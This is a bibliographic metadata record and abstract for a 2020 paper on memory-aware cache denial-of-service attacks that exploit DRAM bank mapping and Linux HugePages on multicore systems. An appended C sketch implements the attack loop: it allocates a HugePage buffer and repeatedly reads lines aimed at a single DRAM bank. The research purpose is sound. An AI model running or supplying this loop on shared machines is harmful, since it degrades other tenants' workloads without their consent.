{"title":"利用DRAM银行映射和HugePages对多核共享缓存进行有效的拒绝服务攻击","authors":"M. Bechtel, H. Yun","doi":"10.1145/3384217.3386394","DOIUrl":null,"url":null,"abstract":"In this paper, we propose memory-aware cache DoS attacks that can induce more effective cache blocking by taking advantage of information of the underlying memory hardware. Like prior cache DoS attacks, our new attacks also generate lots of cache misses to exhaust cache internal shared hardware resources. The difference is that we carefully control those cache misses to target the same DRAM bank to induce bank conflicts. Note that accesses to different DRAM banks can occur in parallel, and are thus faster. However, accesses to the same bank are serialized, and thus slower [5] and as each memory access request takes longer to finish, it would prolong the time it takes for the cache to become unblocked. We further extend these attacks to exploit HugePage support in Linux in order to directly control physical address bits and to avoid TLB contention, while mounting the attacks from the userspace.","PeriodicalId":205173,"journal":{"name":"Proceedings of the 7th Symposium on Hot Topics in the Science of Security","volume":"31 1","pages":"0"},"PeriodicalIF":0.0000,"publicationDate":"2020-08-25","publicationTypes":"Journal Article","fieldsOfStudy":null,"isOpenAccess":false,"openAccessPdf":"","citationCount":"1","resultStr":"{\"title\":\"Exploiting DRAM bank mapping and HugePages for effective denial-of-service attacks on shared cache in multicore\",\"authors\":\"M. Bechtel, H. Yun\",\"doi\":\"10.1145/3384217.3386394\",\"DOIUrl\":null,\"url\":null,\"abstract\":\"In this paper, we propose memory-aware cache DoS attacks that can induce more effective cache blocking by taking advantage of information of the underlying memory hardware. Like prior cache DoS attacks, our new attacks also generate lots of cache misses to exhaust cache internal shared hardware resources. The difference is that we carefully control those cache misses to target the same DRAM bank to induce bank conflicts. Note that accesses to different DRAM banks can occur in parallel, and are thus faster. However, accesses to the same bank are serialized, and thus slower [5] and as each memory access request takes longer to finish, it would prolong the time it takes for the cache to become unblocked. 
We further extend these attacks to exploit HugePage support in Linux in order to directly control physical address bits and to avoid TLB contention, while mounting the attacks from the userspace.\",\"PeriodicalId\":205173,\"journal\":{\"name\":\"Proceedings of the 7th Symposium on Hot Topics in the Science of Security\",\"volume\":\"31 1\",\"pages\":\"0\"},\"PeriodicalIF\":0.0000,\"publicationDate\":\"2020-08-25\",\"publicationTypes\":\"Journal Article\",\"fieldsOfStudy\":null,\"isOpenAccess\":false,\"openAccessPdf\":\"\",\"citationCount\":\"1\",\"resultStr\":null,\"platform\":\"Semanticscholar\",\"paperid\":null,\"PeriodicalName\":\"Proceedings of the 7th Symposium on Hot Topics in the Science of Security\",\"FirstCategoryId\":\"1085\",\"ListUrlMain\":\"https://doi.org/10.1145/3384217.3386394\",\"RegionNum\":0,\"RegionCategory\":null,\"ArticlePicture\":[],\"TitleCN\":null,\"AbstractTextCN\":null,\"PMCID\":null,\"EPubDate\":\"\",\"PubModel\":\"\",\"JCR\":\"\",\"JCRName\":\"\",\"Score\":null,\"Total\":0}","platform":"Semanticscholar","paperid":null,"PeriodicalName":"Proceedings of the 7th Symposium on Hot Topics in the Science of Security","FirstCategoryId":"1085","ListUrlMain":"https://doi.org/10.1145/3384217.3386394","RegionNum":0,"RegionCategory":null,"ArticlePicture":[],"TitleCN":null,"AbstractTextCN":null,"PMCID":null,"EPubDate":"","PubModel":"","JCR":"","JCRName":"","Score":null,"Total":0}
Exploiting DRAM bank mapping and HugePages for effective denial-of-service attacks on shared cache in multicore
In this paper, we propose memory-aware cache DoS attacks that induce more effective cache blocking by taking advantage of information about the underlying memory hardware. Like prior cache DoS attacks, our new attacks generate large numbers of cache misses to exhaust the cache's internal shared hardware resources. The difference is that we carefully control those cache misses so that they target the same DRAM bank and induce bank conflicts. Accesses to different DRAM banks can proceed in parallel and are therefore fast, whereas accesses to the same bank are serialized and therefore slow [5]. Because each memory access request then takes longer to finish, the cache remains blocked for longer. We further extend these attacks to exploit HugePage support in Linux, which lets us directly control physical address bits and avoid TLB contention while mounting the attacks from userspace.
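As an illustration only (not the authors' code), the C sketch below shows the general shape of such a memory-aware attack loop under two stated assumptions: the DRAM bank-index bits are assumed to fall within the 2 MiB HugePage offset (hypothetically, physical address bits 13-16 here), and the set of cache lines touched per pass is assumed to exceed the shared last-level cache capacity, so that every access misses. The constants BANK_SHIFT, BANK_MASK, TARGET_BANK, and the buffer size are hypothetical placeholders, not values from the paper; real DRAM bank mappings are platform-specific and often involve XOR hashing of higher address bits.

/*
 * Minimal sketch of a memory-aware cache DoS loop (illustrative only).
 * Assumptions (hypothetical, platform-specific):
 *   (1) DRAM bank-index bits lie within the 2 MiB HugePage offset
 *       (here, physical bits 13-16), and
 *   (2) the touched cache lines exceed the shared LLC capacity,
 *       so the reads below keep missing in cache.
 * Build: gcc -O2 dos_sketch.c -o dos_sketch
 * Requires reserved HugePages, e.g.: echo 128 > /proc/sys/vm/nr_hugepages
 */
#define _GNU_SOURCE
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <sys/mman.h>

#define HUGE_PAGE    (2UL << 20)             /* 2 MiB HugePage                   */
#define NUM_PAGES    128UL                   /* 256 MiB buffer (assumed > LLC)   */
#define BUF_SIZE     (NUM_PAGES * HUGE_PAGE)
#define LINE         64UL                    /* cache line size                  */
#define BANK_SHIFT   13                      /* hypothetical bank-index position */
#define BANK_MASK    0xFUL                   /* hypothetical 4 bank bits         */
#define TARGET_BANK  0x5UL                   /* arbitrary fixed target bank      */

int main(void)
{
    /* Inside a 2 MiB HugePage, the virtual offset equals the physical offset,
     * so the low 21 physical address bits are known from userspace, and a
     * single large mapping keeps TLB pressure low. */
    uint8_t *buf = mmap(NULL, BUF_SIZE, PROT_READ | PROT_WRITE,
                        MAP_PRIVATE | MAP_ANONYMOUS | MAP_HUGETLB, -1, 0);
    if (buf == MAP_FAILED) {
        perror("mmap(MAP_HUGETLB) - are HugePages reserved?");
        return EXIT_FAILURE;
    }

    volatile uint8_t sink = 0;
    for (;;) {
        /* Touch only the cache lines whose (assumed) bank bits equal
         * TARGET_BANK. The matching working set (BUF_SIZE / 16 = 16 MiB of
         * distinct lines) still exceeds a typical LLC, so these reads keep
         * missing, and every miss is steered toward the same DRAM bank. */
        for (size_t off = 0; off < BUF_SIZE; off += LINE) {
            if (((off >> BANK_SHIFT) & BANK_MASK) == TARGET_BANK)
                sink += buf[off];
        }
    }
    return 0; /* not reached */
}

A single MAP_HUGETLB mapping is used here because it both exposes the low physical address bits and avoids TLB contention for the attacker itself, matching the abstract's stated motivation for exploiting HugePage support from userspace.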